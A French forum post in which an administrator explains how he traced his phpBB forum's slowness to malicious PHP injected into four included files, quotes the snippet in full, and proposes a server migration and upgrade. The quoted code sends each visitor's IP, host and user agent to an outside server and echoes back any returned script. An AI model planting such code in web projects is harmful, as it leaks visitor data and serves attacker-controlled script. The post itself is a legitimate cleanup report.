C'est bon, le forum est réparé.
Rien a voir avec la partie mysql.
On avait 4 fichiers qui étaient inclus dans toutes les pages qui avaient un morceau de code malveillant
Pour le trouver, je me suis tapé le fichier index.php et j'ai fait du reverse en commentant petit a petit et en voyant a partir de quel moment ça allait vite et j'ai finalement trouvé.
Puis j'ai fait un grep sur le curl dans toutes les sources et j'ai trouvé les fichiers contaminés.
Code:
$wp_fw8676 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_fw8676) && !preg_match ('/bot/i', $wp_fw8676))){
$wp_fw098676="http://"."http"."form".".com/form"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_fw8676);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_fw098676);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_8676fw = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_8676fw,1,3) === 'scr' ){ echo $wp_8676fw; }
Grosso modo, a chaque appel de page, ça allait faire un curl (donc faire un autre appel http) a un autre webserver qui semble etre visiblement
http://http.form.com/ en lui passant en parametre notre adresse ip, l'adresse ip du serveur Bref ça allait logger toutes nos connexions sur ce serveur. avec un timeout de 6 secondes.
Visiblement, depuis le 10 Janvier, le serveur form.com ne réponds plus et tu coup le curl était en timeout, et donc prennait 6 secondes avant de répondre. D'ou la lenteur.
PUTAIN
Bon, j'ai checké le forum a été installé en 2013, ce sont les seuls fichiers modifiés en 2014.
bref, je suis content d'avoir trouvé, mais ça me saoule un peu qu'on soit passé a cote dé cela pendant autant de temps (bon y a pas d'impact derrière mais quand meme). Je pense qu'il faut qu'on maintiennent un peu plus a jour le forum. Ce que je vous propose :
- Basculer sur un serveur dédié chez scaleway, pas un gros mais les petits ARM à 3 euros par mois, ce qui nous permet d'avoir complètement la main sur la machine
- en profiter pour se créer des serveurs de "dev" assez facilement sur scaleway (c'est deux clics)
- migrer dans les dernières version de phpbb et sécuriser les mots de passe
Qu'en pensez vous ?